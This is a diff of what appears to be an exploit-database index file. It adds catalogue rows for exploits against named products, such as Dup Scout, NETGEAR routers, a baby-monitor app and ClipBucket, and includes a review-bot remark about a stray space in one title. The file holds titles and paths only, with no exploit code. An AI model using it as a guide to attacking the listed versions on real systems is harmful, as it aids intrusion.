 44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
 44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
+44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
+44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port
 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
 44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
+44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
+44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
+44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port
 44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
+44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
+44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port
 42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
 42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
 42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
-42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php,
+42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
 42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
 42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
 42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
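Review bot: The new description for 42590 has a stray space inside the quoted component name, `' com_Joomanager'`, and the same string appears in the 44252 entry added in the last hunk. Both should read `'com_Joomanager'` so the name matches the component identifier used in the 44252.py script itself and a search for the component finds the entries.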
@@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port
 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
-442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
+44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
+44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
+44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,